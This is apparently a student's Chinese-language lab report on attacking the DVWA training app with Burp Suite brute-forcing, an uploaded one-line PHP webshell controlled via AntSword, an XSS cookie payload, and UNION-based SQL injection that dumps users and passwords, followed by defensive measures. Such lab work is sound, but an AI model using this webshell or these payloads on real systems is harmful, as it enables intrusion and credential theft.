Burpsuite、中国蚁剑、XSS漏洞利用及常见问题

 问题一：代理服务器拒绝连接

 1.检查小皮端口是否为80，或者其他端口在输入时应该加入端口进行访问

 2.Burpsuit的请求拦截未关闭：将拦截请求关闭

 

 问题二：Burpsuit抓的包返回值都为302

1.将重定向改为总是

问题三：爆破密码长度都一样，正确密码长度也与错误密码长度一致

1.改网页的安全级别，LOW或者Medium，然后再退出登录，进行抓包

问题四：AntSword安装问题：

1.在与AntSword同级目录下新建一个文件夹，对初始化文件进行保存

2.运行AntSword时右键进行以管理员身份运行

 

 问题五：上传文件时出现系统拦截，未能上传成功

1.添加\phpstudy_pro\WWW\DVWA-master\hackable\uploads该文件为排除项

 

 2.关闭系统实时保护，然后再进行上传

第一部分，利用burpsuite进行密码爆破。

1.设置浏览器代理ip和端口为127.0.0.1:8080

2.设置DVWA安全等级为LOW

 

3.打开burpsuite拦截禁用

4.将网页包发送到Intruder模块

5.在Intruder模块设置攻击ip和端口（端口为小皮设置的端口）

6.清除$并在用户名和密码位置添加$

 7.载入字典

8.将关注重定向改为“总是”

9.进行攻击得到账户名密码

第二部分，利用文件上传漏洞，上传一句话木马，通过中国蚁剑连接控制。

1.将以下代码写入并保存为up.php文件

<?php
eval($_POST['abc']);
?>

2..上传文件

3.启动中国蚁剑（以管理员身份）

4.添加URL地址（为网站存储的计算机地址），连接密码（为一句话木马内容）

5.使用爆破的密码进行登录，然后使用BP抓包得到Cookie

6.将得到的Cookie填入HEADERS

7.测试连接

 8.右键进入虚拟终端

 

9.目录遍历

 

 10.MYSQL链接

第三部分，利用xss漏洞获取其他主机浏览器cookie

1.输入：<script>alert(document.cookie)</script>获取cookie

第四部分，对dvwa上的sql注入模块进行手动注入，获取当前数据库信息，包括数据库名称、版本、用户名和密码等。

 1.数据库名称、版本、用户名和密码：1' union select 1,database() #

2.数据库版本：1'  union select 1,version() #

3.数据库用户名：1'  union select 1,user() #

4.数据库密码：1' or 1=1 union select group_concat(user_id,first_name,last_name), group_concat(password) from users #

 

 

针对以上漏洞分别提出防范措施。

1. 密码爆破防范：
密码策略： 强制用户使用强密码，并定期更新。密码应包含字母、数字和特殊字符，长度不少于8个字符。
账户锁定： 实施账户锁定机制，例如在多次登录失败后暂时锁定账户，以减缓暴力破解攻击。
多因素身份验证： 引入多因素身份验证，例如使用手机验证码或硬件令牌，提高账户安全性。
登录失败监控： 实施实时监控系统，检测并记录登录失败的尝试，及时发现异常活动。
2. 文件上传漏洞防范：
文件类型检查： 限制上传文件的类型，只允许安全的文件格式，并在服务器端进行严格的文件类型验证。
文件大小限制： 设置合理的文件大小限制，以防止上传大型文件导致服务器资源耗尽。
文件权限： 存储上传文件的目录应设置合适的权限，防止恶意用户执行上传的文件。
防火墙规则： 在网络边界部署防火墙，过滤和阻止具有潜在威胁的文件上传请求。
3. XSS漏洞防范：
输入验证与过滤： 对用户输入进行严格的验证和过滤，移除潜在的恶意脚本。
转义输出： 在显示用户输入的内容时进行HTML转义，确保任何用户提供的内容都不会被浏览器解释为代码。
安全的Cookie： 使用HttpOnly标志设置Cookie，以防止通过脚本访问Cookie的尝试。
内容安全策略（CSP）： 实施CSP，限制页面加载的资源，减少XSS攻击的成功可能性。
4. SQL注入防范：
参数化查询： 使用参数化查询或预处理语句，确保用户输入不直接嵌入SQL查询。
最小权限原则： 为数据库账户分配最小必要的权限，避免使用具有过多权限的账户。
错误处理： 精心处理数据库错误，不要将详细的错误信息暴露给用户，而是记录错误日志供管理员查看。
Web应用防火墙（WAF）： 部署WAF来检测和阻止SQL注入等攻击，保护Web应用。

实验体会

1. 深入理解漏洞： 实际测试让你更深入地理解各种漏洞，包括密码爆破、文件上传漏洞、XSS和SQL注入等。

2. 实战经验： 通过实际的网络安全实验，你能够获得更多的实战经验，学习如何有效地发现和利用漏洞。

3. 防御意识： 通过攻击的过程，你可能会培养起更强的防御意识，理解如何防范这些攻击。

4. 法律和道德观念： 了解网络安全活动的法律和道德规范，知道如何在合法范围内进行实验。

总的来说，网络安全实验可以帮助你更全面地了解网络安全领域，但务必记住，在任何时候都要在合法和道德的框架内进行实验和研究。